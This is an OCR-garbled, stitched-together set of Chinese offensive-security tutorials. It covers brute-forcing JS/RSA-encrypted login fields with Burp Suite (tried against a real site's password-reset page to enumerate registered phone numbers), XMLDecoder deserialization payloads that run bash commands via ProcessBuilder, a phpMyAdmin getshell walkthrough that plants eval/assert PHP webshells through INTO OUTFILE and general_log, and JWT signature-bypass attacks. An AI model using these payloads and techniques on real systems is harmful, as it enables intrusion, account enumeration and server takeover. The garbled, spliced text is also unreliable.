成 爆破 变化 值 ， 先 加 载 字典 ， 然 后 选择 payload 处 理 ，select rule type 这 里 选择 最 后 一 项 


Options [Simpie fist 


id type Jets you configure a simple fst of strings that are used as payloads 


admun a 
123456 





al23456 
1234562 


5201314 


a® 





i "li various processing tasks on each payload before 4 is used 
Add suffix 
Embed — Rue Matchireplace 
Substring " 
| Reverse substring 
Modify case 
| Encode 


© 


TIT 然后 选择 payload 处 理 ，select rule type 这 里 选择 最 后 一 项 
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& .... Add payload processing rule P 
Enter the details of the payload processing rule. 
Invoke Burp extension 


Select processor: jsEncrypter 






OK Cancel | 


然后 start attack! 


tt opoons | Alerts — jsEncrypter | jstncrypter 
Attack hae e Å Á i d. 
Results Target | Posibons | Payloads | Opbons 


Fiter Showing al items 





Request Payload Status Error Timedut Length | Comment 
1 

i oO 200 LM... a yloads are assigned to payload posibons « s 

0 200 90 

2 BAPE v OvRAS 

3 REXNTQKVEMC Sg 

4 

t 

è 

Payload PKrüxzudox TWA RKC YOO Ak Fada DI NPOR IVL A Hagn Lek Ca OST ag 

Status 200 

Length 194 

Timer 1 


Request | Response | 


Raw Headers | Hex 





可 以 看 到 ， 有 一 个 成 功 登陆 的 密码 ， 搜 索 后 发 现 明文 是 admin， 本 地 demo 测 试 结束 ， 在 这 里 可 能 有 
人 说 ， 搞 这 么 麻烦 干 嘛 ， 很 多 基本 hash 加 密 本 来 brup 都 自 带 的 加 密 算法 ， 例 如 md5 shal sha512 那 
些 ， 所 以 这 里 教 的 是 方法 ， 给 你 们 不 变 以 应 万 变 ， 瞎 main 来 个 实战 例子 。 


实战 例子 


1. 这 里 随便 找 的 一 个 找 回 密码 功能 点 
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335888888868 





TT 
eTEN 


T 


到 ， 我 们 这 里 手机 随便 填 了 个 13888888888， 而 抓 包 到 的 手机 号 是 user 参 数 ， 而 且 是 js 加 密 





1. 确 认 账 号 


通行 证 手机 \ 邮 箱 13888888888 “您 的 风 呈 未 注 册 ， 请 先 注册 1! 
: TuS NRN 
验证 码 fjbd tts 
3 : IF JDO NEM 





软件 账号 黎 码 找 图 请 点 此 操作 
Ti 9e C) 育 无 障碍 环境 全 Max HackBar 





rà is X  ExtensionContent.jsm 
IEDIBCeL/ 175») 101599779, i 


im m Bimnainn (EL 


放 包 后 ， 显 示 账 号 尚未 注册 ， 你 也 可 以 说 这 里 可 以 遍历 手机 号 来 探测 注册 用 户 吧 ， 反 正 我 也 
么 挖 src 


我 们 来 分 析 下 js 代码 基本 逻辑 ， 可 以 看 到 这 里 有 key 还 有 public_key， 还 new 了 一 个 rsakey()， 而 
function RSAKey() 是 在 rsaall.js 里 面 的 


p8bgLro8 LV6xeikpfHsjWT/JEiJegeFbCIZQlHlNjOncmq5iDfF9uKaJlR0i21X9wXia-*JZZYtnUBa 
: VFPN2RMSHOJ u/hG2Kif LNdoGo1Av4ZNXBWqHur e0* Vm5ObMRWSQCH81TPXLgOCydPV8EbltttzwBn 
UWomhks= 


也 不 用 管 其 中 过 程 如 何 复杂 ， 我 们 把 rsaalljs 下 载 下 来 ， 放 到 server 文 件 里 面 引 入 ， 然 后 参照 这 
数 的 写法 ， 我 们 魔 改 一 下 serverjs 文 件 ， 再 另存 为 一 个 就 好 。 
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funetion ( )i 


var before - new te(); 


var rsa = new RSAKey(); 


var key 


Lu 


var public key = "96483cb253ae62ffb8bbc3cd5f8fbf4bd3d51: 


var res; 
rsa.setPublic(public key, key); 
res - rsa.encrypt(str); 

var after = new Date(); 

if (res) ( 


return linebrk(hex2b64(res), 


else ( 


return ""; 


最 后 成 品 如 下 : 


64); 
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eg ee ee eae TFT 4 















jsEncrypter rsa.js — script 


tion js_encrypt(pay ad) { 
var newpay load; 
var before Date(); 
var rsa RSAKey(); 
var key "010001"; 
var public_key "96483cb253ae62f fb8bbc3cd5f8fbf4bd3d51ebb32c992bd7649a3 
rsa.setPublic(public key, key); 
newpay load rsa.encrypt (payload) ; 
var after Date(); 

(newpayload) { 

Linebrk(hex2b64(newpayload), 64); 





} 
{ 
} 
(wasSuccessful){ 





onsole, log(" [x oad ex SH 


E 然后 步骤 一 样 ， phantomjs jsEncrypter_rsa.js，brup 那 边 连接 成 功 后 测试 生成 : 
| Imo; 


PERF repeater 





| Headers | Hex 
ofl Roem it NN 













如 果 格式 不 对 它 会 像 上 图 ， 这 里 有 个 坑 点 ， 为 哈 格 式 不 对 呢 ， 因 为 这 里 关键 字符 要 url 编 码 一 
确 加 密 后 会 如 下 图 : 


Raw | Params | Headers tex Raw Headers Hex 


cass d us y 
Sohn ee p 
" . ve — 





可 以 看 到 13888888888， 显 示 不 存在 ， 这 里 常常 我 在 网 上 找 的 在 线 接 短信 网 站 已 经 注册 好 的 号 
19965412404， 加 密 一 下 


[a 
How 127001 Por 1664 Timeout 5000 Connect ICoonecr Test 
19965412404 UXyxS4 fom Wa MURWE 1D /blufim9NGKE pu vDZog méR «vel MI X6VOnAIPCAyApRoDw/SXvZ]mxvONal EIGE ze? v DQxe &SOKRev pOS TR &CNXLGUTL a 


拿 去 试 试 





Go " UMS de rp 
Response 


Request 
| Raw | Params Headers | Hex | Raw | Headers | Hex 
LUE n RR ER MNT Enden. 
s S - $1 ow e LI 





看 ， 显 示 账 号 已 存在 一 至 此 我 们 已 经 成 功 绕 过 了 这 个 网 站 的 js 加 密 ! 
就 当做 个 笔记 的 同时 分 享 给 各 位 老 铁 把 ~ 
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xmldecoder 标 签 
标签 
java 


。 标签 内 属性 : cass. id. version 


public void | { 
if (!vari1.equals("version")) { 
if (vari.equals("class")) ( 
this.type = this.getOwner().findClass(var2); 
) else { 
super.addAttribute(vari, var2); 
} 
} 
} 
。 可 加 载 类 


if (vari.equals("class")) { 
this.type - this.getOwner().findClass(var2); 


} 





。 getValue 与 getValueObject 没 有 直接 的 可 利用 点 。getValue 的 返回 值 为 null 或 者 XMLDecode 
象 ， 看 标签 内 有 没有 写 入 class 属 性 
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ueCbDject 7 APH f getValue iE, get Value7ii2 


HRE 


Object { 





ler, DocumentHandlerbygetOwne: 
Object vari = this.getOwner().getOwner(); 
if (this.type !- null && !this.isValid(vari)) { 
if (vari instanceof XMLDecoder) ( 
XMLDecoder var2 = (XMLDecoder )var1; 
vari = var2.getOwner(); 
if (this.isValid(vari)) { 


return var1; 


throw new IllegalStateException("Unexpected owner class: " + vari.ge 


} else { 


return vari; 


标签 之 间 的 基础 数据 (如 string) 会 写 入 DocumentHandler 中 的 objects， 基 础 数据 值 即 为 标签 
的 返回 值 


3 protected void addArgume je 13 
this.getOwner().addObject(var1); 
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i protected void addArgument(Object var1) { 





w this.getQwner().addObject(var1); vari: d 
et protected boolean isArgument() { return false; } 
M protected ValueObject getValueObject() { 





if (this.value == null) { 
this.value = ValueObjectImpl.create(this.getValue()) 


| return this.value; 
m 


JavaElementHandler addAttribute() 


El 
= Variables 
this = 
f type = "class test" 
t value = null 
f owner - 
f acc = (/ 





f handlers = Map AGE size = 22 

f environment = (is^ 

f objects = (A: 
0 = "hhh" 

loader = {V 

listener = {Statements 

owner = (XMLDecoder(& 

handler = {Str é ndler 

f parent = null 


ì} size = 0 
684) size =1 














e c^ 0 oc 





array 





TI 。 标签 内 属性 : length, class, id 


























public void ttribut s 3 { 
if (vari.equals("length")) { 

III this.length - Integer.valueOf(var2); 

i) } else { 


WA | super .addAttribute(vari, var2); 








| | 。 BMRA, AHF NewElementHandler 






























































。 getValueObject 方 法 要 么 返回 Object 对 象 ， 要 么 返回 Array 类 的 实例 化 ， 因 此 无 法 起 到 像 object 
TIAM 标签 的 效果 
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protected ValueObjeet getValuedbject (Class<7 Vari, Object[]-var2) { 
if (vari == null) { 
vari = Object.class; 


if (this.length != null) { 

return ValueObjectImpl.create(Array.newInstance(vari, this.length)); 
} else { 

Object var3 = Array.newInstance(vari, var2.length); 


for(int var4 = 0; var4 < var2.length; ++var4) { 
Array.set(var3, var4, var2[var4]); 
} 
return ValueObjectImpl.create(var3); 
} 
" T ` 
标签 返回 值 为 Array 类 对 象 


array class="test"> 
-«/array» 


decoder 
Ibrary/Java/JavaVirtualMachines/jdk1.8.0 221.jdk/Contents/Home/bin/java tate 
fest ;@5451c¢3a8 


ess finished with exit code 0 


= @Override 

public Object getvalue(String argument) { 
T return getOwner().findClass(argument); 
b 

getvalue 加 载 进 类 

标签 返回 值 为 Class WR 


SClass>test</class> 
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testxmidecoder 


/Library/Java/JavaVirtualMachines/jdk1.8.0_221.jdk/Contents/Home/bin/ja 
class test 


Process finished with exit code 0 


object 


。 标签 内 属性 : class. method. property. field. index, id. idref 


public final void | { 
if (vari.equals("idref")) { 
this.idref - var2; 
} eise if (vari.equals("field")) { 
this.field - var2; 
) else if (vari.equals("index")) { 
li this.index - Integer.valueOf(var2); 
| this.addArgument(this.index); 
) eise if (vari.equals("property")) { 
| this.property = var2; 
I } else if (vari.equals("method")) { 
| this.method = var2; 
M } else { 
super.addAttribute(vari, var2); 











| 。 可 加 载 类 ， 继承 于 NewElementHandler 





| 。 getValueObject 方 法 中 ， 若 field、idref 属 性 未 加 载 ， 则 可 传 入 以 下 变量 ， 并 调用 


I o 类 对 象 (object 标 签 中 的 class 对 象 or 父 标签 返回 的 对 象 ) 
Hl o object 标 签 之 间 的 部 分 标签 作为 方法 参数 
o 方法 名 (set or get or new or method) 
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Mrected final ValueObject getvalu: ect (Class<?> vani, Objectf] var2) thr 
"else { 


Object var3 = this.getContextBean(); 
String var4; 


if (this.index != null) { 

var4 = var2.length == 2 ? "set" + "get"; 
} else if (this.property != null) { 

var4 = var2.length == 1 ? "set" : "get"; 


if (0 < this.property.length()) { 


var4 = var4 + this.property.substring(°, | ).toUpperCase(Loca 
} 
} else { 
var4 = this.method != null && 9 < this.method.length() ? this.me 
} 
Expression var5 = new Expression(var3, var4, var2); 


return ValueObjectImpl.create(var5.getValue()); 


等 返回 值 为 实例 化 对 象 
rary/Java/JavaVirtualMachines/jdk1.8.0 221.jdk/Contents/Home/bin/java ... 
t07c3df479 


cess finished with exit code 0 


ewElementHandler 
党 于 object， 与 object 有 极 大 的 相似 性 。 使 用 void 标签 ， 无 论 什么 形式 ， 都 会 进入 object 标 签 
getValueObject 方 法 


SARI: class, id 
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field 


public void he(String vari, String var2) {7 
if (vari.equals(“class")) { 
this.type = this.getOwner().findClass(var2) ; 
} else { 
super.addAttribute(vari, var2); 


} 
j 
。 可 加 载 类 
。 getValueObject 方 法 可 传 入 以 下 变量 ， 并 实例 化 类 
o 类 


o 构造 函数 参数 


if (vari == null) ( 


throw new IllegalArgumentException("Class name i: | "ys 
) eise ( 


Class[] var3 = getArgumentTypes(var2) ; 






Constructor var4 = ConstructorFinder.findConstructor(vari, var3), 
if (var4.isvarArgs()) { 
var2 = getArguments(var2, var4.getParameterTypes()); 


return ValueObjectImpl.create(var4.newInstance(var2)); 


。 返回 值 为 类 对 象 


testxmldecoder 


/Library/Java/JavaVirtualMachines/jdk1.8.0 221.jdk/Contents/Home/bin/java 
testQ79fcOf2f 


... 


Process finished with exit code 0 


。 标签 内 属性 : class, name, id 
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ublic void : String €, String value) { 





1 + n » i P 
if (name.equals("class")) { NLS: the attribute name 
this.type = getOwner().findClass(value); 
eise { 


super.addAttribute(name, value); 


class 属 性 在 field 标 签 中 ， 得 到 的 是 Class 对 象 ， 因 而 name 只 能 是 static 的 变量 


«field class= st" name= ></field> 





ary/Java/JavaVirtualMachines/jdk1.8.0 221. jdk/Contents/Home/bin/java s 
ij. lang. NoSuchFieldException: Field 'hhh' is not static 
t] nuing ene 


ELAN BIO SU Classi. Mame Rei 


Object class="test"> 
<field class="test" name="hhh"></field> 
object» 


Bivate static Field | throws NoSuchFieldExc 
prim gc 
P return var® instanceof Class ? FieldFinder.findStaticField((Class)varO, vari 


回 值 为 变量 对 应 的 对 象 什 


ic class test{ 
Public static String ^^^-"field value"; 


ecoder 
Jrary/Java/JavaVirtualMachines/jdk1.8.0 221.jdk/Contents/Home/bin/java . 


标签 内 属性 : class, name. id 


可 加 载 类 ， 继 承 于 NewElementHandler 
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。 getValueObject 方 法 中 p $ 
- Bu 


o class 属性 存在 ， 则 加 载 class， 调 用 class 中 的 static 方 法 ， 方 法 名 为 name 属 性 值 
o class 属 性 不 存在 ， 则 根据 父 标签 得 到 Class 对 象 ， 调 用 Class 对 象 的 方法 (无 限制 ) ， 
名 为 name 属 性 值 








thro 


protected ValueObject 
Object var3 = :^is.getContextBean(); 
Class[] var4 = getArgumentTypes(var2); 


Method var5 = vari != null ? MethodFinder.findStaticMethod(vari, thi 


if (var5.isVarArgs()) { 
var2 = getArguments(var2, var5.getParameterTypes()); 


Object var6 = MethodUtil.invoke(var5, var3, var2); 
return var5.getReturnType().equals(Void.TYPE) ? ValueObjectImpl.VOID 


。 返回 值 为 调用 函数 的 返回 值 


property 
。 标签 内 属性 : index, name, id 


。 不 可 加 载 类 





。 可 调用 setXXX 和 getXXX 方 法 ，name 用 作 索 引 类 中 的 成 员 变 量 ，property 标 签 之 间 表示 传 入 
setXXX 的 参数 


o setXXX 方 法 使 用 


<object class="test"> 
«property namez"xixixi"» 
«string»open /etc«/string» 
«/property» 
j </object> 








| o getXXX 方 法 使 用 


<object class="test"> 





«property name="xixixil> 





</property> 
</object> 


| byte 
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GE 
te [类 型 的 时 候 ， class 不 是 java.lang.Byte 而 是 byte 
æ 


lect class-"java.net.Socket"» 
'estring»127.0.0.1«/string» 
‘<int>6666</int> 
‘<void method="getOutputStream"> 
<void method="write"> 
«array class-"byte" length="2"> 
«void index="0"> 
<byte>49</byte> 
</void> 
«void index="1"> 
<byte>49</byte> 
</void> 
</array> 
{ </void> 
= «/void» 


每 个 元 素 代表 一 个 方法 调用 

包含 元 素 的 元 素 将 这 些 元 素 用 作 参 数 ， 除 非 它们 具有 标记 :“void"。 (关键 ) 

方法 的 名 称 由 *method" 属 性 表示 。 

XML 的 标准 "id" 和 "idref' 属 性 用 于 引用 先前 的 表达 式 - 以 便 处 理 对 象 图 中 的 圆 形 。 

使 用 "array" 标 记 写 入 对 数组 的 引用 。"class" 和 "length" 属 性 分 别 指定 数组 的 子 类 型 及 其 长 度 。 
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其 他 
xmildecoder 漏 洞 在 getValueObject 方 法 触发 


<object class= lang.ProcessBuilder"» 





«array class="je length="3"> 


<void index= > 


<string>/bin/bash</string> 
</void> 


«void index="1"> 
<string>-c</string> 
</void> 
<void index= > 
<string>open /Applications/Calculator .app</string> 
</void> 


«/array» 


«void method="start"> 
«/void» 


</object> 


this = {ArrayElementHandler@941} 
Variables debug info not available 

vari (slot 1) = {ValueObjectImp|@1045} 
f value = {String[3]@1818} 
"bin/bash" 

Tamo" 

"open /Applications/Calculator.app" 
| f isVoid = false 


e 
H 





N 
it 


若 标签 内 存在 id 属性 ， 则 调用 this.owner.setVariable(this.id, vari.getValue()); FA 
DocumentHandler 的 environment 变 量 。 


不 存在 id 属性 ， 则 调用 this.owner.addObject(vari.getValue()); 存 入 DocumentHandler 的 
objects 变 量 。 


这 里 的 environment 不 清楚 是 做 什么 的 ，objects 变 量 是 标签 的 返回 值 。 
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ENvoid end! {wm 4 » 
alueObject vari = this.getValueObject(); 
f (1var1.isVoid()) { 


if (this.id != null) { 
this.owner.setVariable(this.id, vari.getValue()); 
} 
if (this.isArgument()) { 
if (this.parent != null) { 
this.parent.addArgument (vari.getValue()); 
) eise ( 


this.owner.addObject(vari.getValue()); 






yject class="java.lang.ProcessBuilder"> 

| «array class-"java.lang.String" length="3"> 

| <void index="0"> 
<string>/bin/bash</string> 

</void> 

<void index="1"> 
<string>-c</string> 

</void> 

<void index="2"> 
<string>/Applications/Calculator .app/</string> 

</void> 

~ «/array» 


'object» 


接 字 ， 连 接 127.0.0.1 的 6666 端 口 并 发 送 数据 
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<object class="java.net,Socket"> 
<string>127.0.0.1</string> 
<int>6666</int> 

«void method-"getoi 


«void methad="w 








«array class-"byte" length- 2 > 
«void index="0"> 
<byte>49</byte> 
</void> 


«void index="1"> 


<byte>49</byte> 
</void> 
«/array» 
</void> 
i </void> 
</object> 

| 

| 创建 文件 并 写 入 

| 

| <object class="java.io.Printwriter"> 
Il «void class="java.io.FileOutp > 
M| <string>2.txt</string> 





</void> 

M <string>2.txt</string> 
|| 

«void method-"print"» 


«string»xmldecoder vul test«/string» 
</void> 





<void method="close"/> 
</object> 
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AphpMyAdminz#getshell 


o. 前 言 

jsql 语 句 之 前 ， 拿 到 phpmuadmin 弱 口令 登录 到 后 台 却 不 知道 怎么 利用 ， 学 习 之 后 却 有 了 新 的 
| 用 phpMyadmin getshell。 接 下 去 来 验证 自己 的 猜想 。 

到 的 实验 环境 : 


Win7 云 服务 器 (版 本 与 本 次 实验 无 关 ) 

ipache 2.4.39 (版 本 与 本 次 实验 无 关 ) 

MySQL5.7.26 (版 本 与 本 次 实验 无 关 ) 

ipMyAdmin4.8.5 (版 本 与 本 次 实验 无 关 ) 

瞻 对 路 径 C:/phpstudy_proWWW/ (版 本 与 本 次 实验 无 关 ) 


01. phpMyAdmin 的 简介 


MyAdmin 是 一 个 以 PHP 为 基础 ， 以 Web-Base 方 式 架构 在 网 站 主机 上 的 MySQL 的 数据 库 管理 工 
证 管理 者 可 用 Web 接 口 管理 MySQL 数 据 库 。 借 由 此 Web 接 口 可 以 成 为 一 个 简易 方式 输入 繁杂 

语法 的 较 佳 途径 ， 尤 其 要 处 理 大 量 资料 的 汇 入 及 汇 出 更 为 方便 。 其 中 一 个 更 大 的 优势 在 于 由 于 
NyAdmin 跟 其 他 PHP 程 式 一 样 在 网 页 服务 器 上 执行 ， 但 是 您 可 以 在 任何 地 方 使 用 这 些 程式 产生 
[ML 页 面 ， 也 就 是 于 远 端 管理 MySQL 数 据 库 ， 方 便 的 建立 、 修 改 、 删 除数 据 库 及 资料 表 。 也 可 
phpMyAdmin 建 立 常用 的 php 语 法 ， 方 便 编写 网 页 时 所 需要 的 sql 语 法 正确 性 。 


02. 关于 phpMyAdmin getshell 姿 势 的 猜想 


我 们 来 看 一 下 phpMyAdmin 的 界面 。 


; i. SQL à us ae Su æ BA Wh Vt 
A 
He 
i MS m für 
* IEE 操作 


24 utt uni cede ci 





ELCUBI IER IGL OTE ER MySQL REID Ge MUR. 
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结合 上 面 phpMyAdmin 的 功能 分 析 就 有 了 两 种 思路 : p os 
1. 利 用 sql 语 句 创建 一 张 包含 php 一 句 话 的 表 ， 以 php 后 缀 的 形式 导出 到 网 站 的 绝对 路 径 。 


2. 利 用 环境 变量 中 的 日 志 记录 功能 ， 设 置 日 志保 存 的 地 址 为 绝对 路 径 的 地 址 ， 保 存 日 志 的 格 起 
后 缀 的 文件 ， 利 用 sq| 的 语句 ， 让 含有 php 一 句 话 的 查询 记录 被 写 入 在 日 志 中 。 


0x03. 关于 猜想 的 验证 


首先 验证 第 一 种 猜想 ， 即 用 sql 语 句 创 建 数 包含 php 一 句 话 的 数据 表 的 形式 ， 利 用 导出 功能 将 ph 
句 话 导 出 到 站 点 的 绝对 路 径 。 利用 以 下 的 sql 语 句 进行 猜想 验证 


create database test;  # 建 立 立 数据 库 test 
use test;  # 应 接 test 数 据 库 # 

Create TABLE test (test text NOT NULL); # 在 test 数 据 库 中 建立 test， 字 段 
Insert INTO test (test) VALUES('<?php eval($_POST[sink])?>'); #48 Aphp 


mysa 让 在 量 示 第 0.6 行 UX 1 60. A 0 0008 e. ) 
performance schema 
$ sys 
test: 
E 
+. test “3 
t irig 2 w 8 ns 
test M edd 
?php evali$, POST[sink]?? 
v 
Red 
m dd, 


如 图 所 示 ， 到 这 里 我 们 的 操作 都 已 经 完整 的 操作 成 功 了 。 接 下 去 我 们 用 sql 语 句 把 一 句 话 木 马 以 php 
后 缀 的 形式 导出 到 网 站 的 绝对 路 径 


select test into outfile 'C:/phpstudy_pro/www/1.php' from test 


y pro/WWW/shell.php' from test 


如 图 出 现 了 报错 。 这 里 报错 的 原因 是 因为 secure_file_prive 的 值 的 原因 : 
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ure_file_prive=null -- 限制 nysqld 不 允许 导入 导出 一 D 
re file priv-/tmp/ -- 限制 mysqld 的 导入 导出 只 能 发 生 在 /tmp/ 目 录 下 
jure file priv-' ' -- 不 对 mysqld 的 导入 导出 做 限制 


年 环境 变量 中 查看 ， 可 以 看 到 secure_file_prive 的 值 为 NULL， 那 么 就 是 默认 对 mysqlid 的 导出 做 
lo 所 以 这 个 利用 我 们 失败 了 。 








候 我 们 想到 了 可 以 利用 日 志 记 录 的 功能 去 向 网 站 的 绝对 路 径 写 入 我 们 的 webshell。 首先 在 环境 
中 搜索 general log。 


wes 





P genera 23 
|o RM Ne a 


generat io) 


genera bog file 


l 


: 量 是 OFF 状 态 的 ， 存 储 的 路 径 在 这 里 都 能 看 到 。 因 为 是 root 权 限 所 以 我 们 可 以 对 这 两 个 变量 
以， 将 OFF 改 成 ON 把 原来 的 路 径 换 成 我 们 的 绝对 路 径 ， 并 且 在 绝对 路 径 下 创建 一 个 php 后 绥 





SQL ik R^ . Dro us & TOS ? un 


EX: genero 
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接着 我 们 进 到 靶 机 的 绝对 路 径 的 文件 夹 下 ， 可 以 看 到 生成 了 一 个 我 们 构造 的 日 志 存 储 日 光 


件 如 下 图 。 - 
"E 
t » RETA > TUES (C) » phpstudy pro » WWW » 

DE. 

8 erro 

i phpMyAdimn4 8.5 
"Vy UR index 

shell php 

i0 

8 
查看 shell.php 里 面 的 内 容 


C:\phpstudy_pro\ComM\. .\Extensions\MySQL5.7.26\\bin\mysqld.exe, Version: 5.7 


TCP Port: 3306, Named Pipe: MySQL 


Time Id Command 
2019-11-02T07:28:22.841231Z 


Argument 


2019-11-02T07:28:22.864303Z 341 Quit 
2019-11-02T07:28:22.864761Z 340 Quit 





LEGEND 0-0 £5 OX 1 iy, 机 网 世相 0.0003 ^, ) 





<?php assert{$_ POST[sink]).?» 


p asse 


BST 


3 eS 


查看 日 志 记录 ， 看 到 一 句 话 已 经 被 写 进去 了 。 


BRK SQL 状态 WO = 导出 


然后 接着 使 用 sql 查 询 语句 将 php 一 句 话 写 入 记录 的 日 志 
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BA 


wis 


"iot | 


340 Query SHOW GLOBAL VARIABLES WHERE Variable. 








































Poel i 
j-11-02107:32:27.1601532 350 Query SELECT version, "version comment 
41-0270? : 32:27.1616892 350 Query SET NAMES 'utfémb4' COLLATE 'utfümb4 general ci' 
11-02107:32:27.1619572 350 Query SET lc messages = 'zh CN' b "n 
11-02107:32:27.1757312 351 Connect — root/localhost on using TCP/IP 
|411-02107:32:27.1838832 350 Query SELECT SCHEMA NAME FROM INFORMATION SCHEMA . SCHEMATA 
11-02107:32:.27.1964127 350 Query SET collation connection = 'utf8mb4 unicode ci' 
11-02107:32.27.2040072 351 Quit T E 
11-0270): 32.27. 2043422 350 Quit 
11-027T07:32 27.9815862 352 Connect root/localhost on using TCP/IP 
11-02107:32:27.981801z 352 Query SELECT ''version, "version comment 
11-02107:32:27.9836252 352 Query SET NAMES 'utfBmb4' COLLATE 'utfSmb4 general ci' 
11-02T07:32:27 5838447 352 Query SET lc messages = ‘zh_CN’ 
11-02107:32:27.9868452 353 Connect reot#lecalhost on using TCP/IP 
11-02707:32.27.9936212 352 Query SELECT SCHEMA NAME FROM INFORMATION SCHEMA . SCHEMATA 
11-02107:32.28.0050662 352 Query SET collation connection - 'utfümb4 unicode ci' 
11-0270?:32.28.0137112 353 Quit 
19-11-0270? : 28.0139312 352 Quit 
9-11-02107: 31. 6697852 354 Connect root/localhost on using TCP/IP 
41-02707: 32-31.6700182 354 Query SELECT version, ^'version comment 
11-02707:32:31.6716802 354 Query SET NAMES ‘utf@mb4' COLLATE 'utf8mb4 general ci' 
11-02101:32:31.6718762 354 Query SET lc messages = ‘zh_CN’ D 
11-02707:32 31.6844432 355 Connect root?localhost on using TCP/IP 
11-02107:32:31.6920202 354 Query SELECT SCHEMA NAME FROM INFORMATION SCHEMA . SCHEMATA 
11-02707:32:.31.7040252 354 Query SET collation connection = ‘utf@mb4 unicode ci’ 
i911-02707: 32-31. 7108032 354 Query SHOW SESSION VARIABLES LIKE “FOREIGN KEY CHECKS 
41-02707:32°31.7140832 354 Query SHOW SESSION VARIABLES LIKE “FOREIGN KEY CHECKS 
1911-02707 : 32 31. 7208492 354 Query SHOW SESSION VARIABLES LIKE “FOREIGN KEY CHECKS” 
( 11*02707:32:31.725383672 354 Query SHOW SESSION VARIABLES LIKE "FOREIGN KEY CHECKS 





0] 11-027T07:32.31.7331092 354 Query SHOW SESSION VARIABLES LIKE FOREIGN KEY CHECKS 
i9-11-02707:32:.31.2431232 354 Query SELECT ' assert 
MIi- T : 4 K WAFNIN 


ry Ww st N 


K 刀 连 接 即 可 。 


)4. 思考 ， 如 何 对 刚才 的 第 一 种 方式 进行 利用 


改 secure file_pri 的 值 ， 先 找到 myini 配 置 文件 ， 加 入 在 mysqld 目 录 下 ，secure_file_priv="， 重 


secure file prv 


—Fsecure file priv 的 值 ， 已 经 由 刚才 的 NULL 变 成 了 空 。 
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MySQL BSNS (OTe), GNIS 00065 V, ) E 


xWÉ 


Ses wen 


执行 导出 语句 ， 导 出 成 功 。 查 看 文件 


é 1 9 REPR finus 5» phpstudy pro » WWW 





lphp- 记事 本 


菜刀 连接 即 可 。 
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的 全 称 是 Json Web Token。 它 遵循 JSON 格 式 ， 将 用 户 信息 加 密 到 token 里 ， 服 务 器 不 保存 任 
户 信息 ， 只 保存 密 钥 信息 ， 通 过 使 用 特定 加 密 算法 验证 token， 通 过 token 验 证 用 户 身份 。 基 于 
n 的 身份 验证 可 以 替代 传统 的 cookiet+session 身 份 验 证 方法 。 


三 个 部 分 组 成 : header . payload . signature 


ader 部 分 


ger 部 分 最 常用 的 两 个 字段 是 alg 和 typ, alg 指定 了 token 加 密使 用 的 算法 (最 常用 的 为 
AC 和 RSA 算 法 ) ，typ` 声 明 类 型 为 JWT 


der 通 常会 长 这 个 样子 : 


salou "HS256", 
"typ" , "jwt" 







| load 部 分 


load 则 为 用 户 数 据 以 及 一 些 元 数据 有 关 的 声明 ， 用 以 声明 权限 ， 举 个 例子 ， 一 次 登录 的 过 程 可 能 
35 DU ds 


1 Busersrole d "Tinni, // 当 前 登录 用 户 

B iss": "admin", // 该 JWT 的 签发 者 

E iat": 1573440582, // 签 发 时 间 

"exp": 1573940267, // 过 期 时 间 

- "nbf": 1573440582, // 该 时 间 之 前 不 接收 处 理 该 Token 

- "domain": "example.com",  // 面 向 的 用 户 

"jti": "dff4214121e83057655e10bd9751d657" ”//Token 唯 一 标识 


nature 部 分 


ature 的 功能 是 保护 token 完 整 性 。 
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生成 方法 为 将 hneader 和 payload 两 个 部 分 联结 起 来 ， 然后 通过 header 部 分 指定 的 算法 ， 计 香 
名 。 


抽象 成 公式 就 是 


signature = HMAC-SHA256(base64urlEncode(header) + '.' + 
base64urlEncode(payload), secret_key) 


值得 注意 的 是 ， 编 码 header 和 payload 时 使 用 的 编码 方式 为 base64urlencode , base64ur 
码 是 base64 的 修改 版 ， 为 了 方便 在 网 络 中 传输 使 用 了 不 同 的 编码 表 ， 它 不 会 在 未 尾 填充 所 
并 将 标准 Base64 中 的 "+" 和 "分 别 改 成 了 "* 和 "-"。 


完整 token 生 成 


一 个 完整 的 jwt 格 式 为 ( header . payload . signature )， 其 中 header、payload 使 用 base6 
码 ，signature 通 过 指定 算法 生成 。 


python 的 Pyjwt 使 用 示例 如 下 


import jwt 
encoded jwt = jwt.encode(('user name': 'admin'), 'key', algorithm-'H: ) 
print(encoded jwt) 
print(jwt.decode(encoded jwt, ‘key’, algorithms=['4S256'])) 
生成 的 token 为 


eyJhbGcioiJIUzI1NiISInR5cCI6IkpXxVCJ9 . eyJic2VyX25hbWUiOiJhZGi1pbiJ9. oL5szC7m 
J 7FI9UVMcKfmisqreQlo1dusps5wOUlo' 


攻击 方式 
加 密 算法 


1. 空 加 密 算法 
JWT 支 持 使 用 空 加 密 算法 ， 可 以 在 header 中 指定 alg 为 None 


这 样 的 话 ， 只 要 把 signature 设 置 为 空 ( 即 不 添加 signature 字 段 ) ， 提 交 到 服务 器 ， 任 何 token 都 可 
以 通过 服务 器 的 验证 。 举 个 例子 ， 使 用 以 下 的 字段 
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[ "alg" : "None", 
> "typ" : OW? 


"Admin" 


















| "user" : 


的 完整 token 
W 9KCSJhbGcilDogIk5vbmUiLAOKCSJOeXAilDogImp3dCINCnO.ewOKCSJic2VyIiAGICJBZGi1pbi 


dert'.'tpayload, zki9 T '.*signature"z ER) 


ESL ISIHUSRU TB, (IIDSRSCXIDEARBISEAST, (/EPHRIBIITBTSS 
算法 ， 缺 少 签名 算法 ，jwt 保 证 信息 不 被 纂 改 的 功能 就 失效 了 。 攻 击 者 只 需要 把 alg 字 段 设置 为 
o 就 可 以 在 payload 中 构造 身份 信息 ， 伪 造 用 户 身份 。 


覆 改 HMAC 加 密 算法 为 RSA 
中 最 常用 的 两 种 算法 为 HMAC 和 RSA o 


是 密 钥 相 关 的 哈 希 运算 消息 认证 码 (Hash-based Message Authentication Code) 的 缩写 ， 
-种 对 称 加 密 算法 ， 使 用 相同 的 密 钥 对 传输 信息 进行 加 解密 。 


则 是 一 种 非 对 称 加 密 算法 ， 使 用 私 钥 加 密 明 文 ， 公 钥 解 密 密 文 。 


ACE 和 RSA 算 法 中 ， 都 是 使 用 私 钥 对 signature 字段 进行 签名 ， 只 有 拿 到 了 加 密 时 使 用 的 私 
有 可 能 伪造 token。 


i 假设 有 这 样 一 种 情况 ， 一 个 Web 应 用 ， 在 JWT 传 输 过 程 中 使 用 RSA 算 法 ， 密 钥 pem 对 
ken 进 行 签名 ， 公 钥 pub 对 签名 进行 验证 。 






4 alg" : "RS256", 
"typ" : "jwt" 


